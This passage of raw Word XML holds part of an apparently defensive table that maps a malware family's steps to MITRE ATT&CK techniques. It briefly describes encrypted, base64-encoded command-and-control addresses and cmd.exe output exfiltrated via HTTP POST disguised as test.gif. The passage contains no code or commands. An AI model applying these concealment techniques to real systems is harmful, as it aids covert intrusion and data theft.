              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1573 Encrypted Channel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="714E6CE8" w14:textId="225D71D8" w:rsidR="00B54722" w:rsidRPr="00B54722" w:rsidRDefault="00F41B68" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="660" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68B502BB" w14:textId="77777777" w:rsidR="00B54722" w:rsidRPr="00B54722" w:rsidRDefault="00B54722" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="560" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0336A2EB" w14:textId="516A5140" w:rsidR="00B54722" w:rsidRPr="00B54722" w:rsidRDefault="00F41B68" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="779" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6214C2D2" w14:textId="4B74E078" w:rsidR="00B54722" w:rsidRPr="00B54722" w:rsidRDefault="003519AF" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2341" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19413CFF" w14:textId="77777777" w:rsidR="00327101" w:rsidRDefault="00327101" w:rsidP="00616B39">
            <w:r>
              <w:t>Message out</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5182EDFF" w14:textId="40480356" w:rsidR="00B54722" w:rsidRPr="00B54722" w:rsidRDefault="00B54722" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00BA6DC3">
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">] </w:t>
            </w:r>
            <w:r w:rsidRPr="00AB4C4F">
              <w:t>Makes HTTP requests to command and control servers: The server addresses have been base64 encoded and encrypted using a custom encryption algorithm</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00040BCB" w:rsidRPr="00B54722" w14:paraId="35CDECB2" w14:textId="77777777" w:rsidTr="002E403F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="773" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57E1B563" w14:textId="2DD49CDC" w:rsidR="00040BCB" w:rsidRPr="00B54722" w:rsidRDefault="00040BCB" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B54722">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08F883FD" w14:textId="77777777" w:rsidR="00040BCB" w:rsidRPr="00B54722" w:rsidRDefault="00040BCB" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B54722">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">TA0011 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Command and Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2148" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40EC3F67" w14:textId="77777777" w:rsidR="00040BCB" w:rsidRPr="00B54722" w:rsidRDefault="00040BCB" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1573 Encrypted Channel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="424918A0" w14:textId="1A896768" w:rsidR="00040BCB" w:rsidRPr="00B54722" w:rsidRDefault="00327101" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="660" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09429389" w14:textId="77777777" w:rsidR="00040BCB" w:rsidRPr="00B54722" w:rsidRDefault="00040BCB" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="560" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A22A757" w14:textId="21914D55" w:rsidR="00040BCB" w:rsidRPr="00B54722" w:rsidRDefault="00F41B68" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="779" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E7A93C3" w14:textId="06BAD252" w:rsidR="00040BCB" w:rsidRPr="00B54722" w:rsidRDefault="003519AF" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2341" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09965404" w14:textId="77777777" w:rsidR="00327101" w:rsidRDefault="00327101" w:rsidP="002E403F">
            <w:r>
              <w:t>Message in</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F8393E7" w14:textId="2552DA24" w:rsidR="00040BCB" w:rsidRPr="00B54722" w:rsidRDefault="00040BCB" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00BA6DC3">
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">] </w:t>
            </w:r>
            <w:r w:rsidRPr="00AB4C4F">
              <w:t>Makes HTTP requests to command and control servers: The server addresses have been base64 encoded and encrypted using a custom encryption algorithm</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00784F2A" w:rsidRPr="00960473" w14:paraId="472B8362" w14:textId="77777777" w:rsidTr="008035DA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="773" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04672F59" w14:textId="4AF042B8" w:rsidR="00784F2A" w:rsidRPr="00960473" w:rsidRDefault="00784F2A" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00960473">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="059017F1" w14:textId="3F8B43D6" w:rsidR="00784F2A" w:rsidRPr="00960473" w:rsidRDefault="00884A91" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00960473">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00960473">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00960473">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2148" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03F32B48" w14:textId="20789461" w:rsidR="00784F2A" w:rsidRPr="00960473" w:rsidRDefault="00960473" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00960473">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1059.003</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00960473">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Command and Scripting Interpreter: Windows Command Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22D01B83" w14:textId="72FB8F13" w:rsidR="00784F2A" w:rsidRPr="00960473" w:rsidRDefault="00960473" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="660" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24BC2677" w14:textId="77777777" w:rsidR="00784F2A" w:rsidRPr="00960473" w:rsidRDefault="00784F2A" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="560" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="611C6DB5" w14:textId="37ACC7C2" w:rsidR="00784F2A" w:rsidRPr="00960473" w:rsidRDefault="00960473" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="779" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1AA9A7BA" w14:textId="541B475B" w:rsidR="00784F2A" w:rsidRPr="00960473" w:rsidRDefault="003519AF" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2341" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79943E6B" w14:textId="3F6399D6" w:rsidR="00784F2A" w:rsidRPr="00960473" w:rsidRDefault="00960473" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00960473">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00BA6DC3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidRPr="00960473">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>] Output of cmd.exe has been encoded and encrypted and is sent to the server as test.gif using an HTTP POST request</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001D4C19" w:rsidRPr="00ED5880" w14:paraId="629314D3" w14:textId="77777777" w:rsidTr="008035DA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="773" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C859B68" w14:textId="5E2CADDF" w:rsidR="001D4C19" w:rsidRPr="00ED5880" w:rsidRDefault="00960473" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="184CF3B5" w14:textId="5AB3D46A" w:rsidR="001D4C19" w:rsidRPr="00ED5880" w:rsidRDefault="001D4C19" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>00</w:t>
            </w:r>
            <w:r w:rsidR="00CB2838">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="005D751B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2148" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B2E20C0" w14:textId="77777777" w:rsidR="001D4C19" w:rsidRPr="00ED5880" w:rsidRDefault="001D4C19" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1049 System Network Connections Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F84BBD9" w14:textId="3DA5A7F3" w:rsidR="001D4C19" w:rsidRPr="008964D1" w:rsidRDefault="003F367A" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="660" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72EAB84D" w14:textId="77777777" w:rsidR="001D4C19" w:rsidRPr="00ED5880" w:rsidRDefault="001D4C19" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="560" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3165E4F9" w14:textId="7A762E87" w:rsidR="001D4C19" w:rsidRPr="00ED5880" w:rsidRDefault="008964D1" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="779" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="13AB46DC" w14:textId="77044F84" w:rsidR="001D4C19" w:rsidRPr="00ED5880" w:rsidRDefault="003519AF" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-DIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2341" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2CCA28FC" w14:textId="09C5F355" w:rsidR="001D4C19" w:rsidRPr="00C40957" w:rsidRDefault="001D4C19" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Known examples from Group description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001D4C19" w:rsidRPr="00ED5880" w14:paraId="1303833E" w14:textId="77777777" w:rsidTr="008035DA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="773" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4EED7740" w14:textId="19B06375" w:rsidR="001D4C19" w:rsidRPr="00ED5880" w:rsidRDefault="00960473" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="585DA6AB" w14:textId="61E26893" w:rsidR="001D4C19" w:rsidRPr="00ED5880" w:rsidRDefault="001D4C19" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>00</w:t>
            </w:r>
            <w:r w:rsidR="00CB2838">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">7 </w:t>
            </w:r>
            <w:r w:rsidR="005D751B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="005D751B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2148" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BCFD3BA" w14:textId="25A9BE05" w:rsidR="001D4C19" w:rsidRPr="00ED5880" w:rsidRDefault="001D4C19" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>57</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Process</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32A99DA8" w14:textId="7B84D49F" w:rsidR="001D4C19" w:rsidRPr="008964D1" w:rsidRDefault="003F367A" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="008F67F4">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="660" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08231949" w14:textId="77777777" w:rsidR="001D4C19" w:rsidRPr="00ED5880" w:rsidRDefault="001D4C19" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="560" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22CD494C" w14:textId="22E3ED5A" w:rsidR="001D4C19" w:rsidRPr="00ED5880" w:rsidRDefault="008964D1" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="779" w:type="dxa"/>
          </w:tcPr>
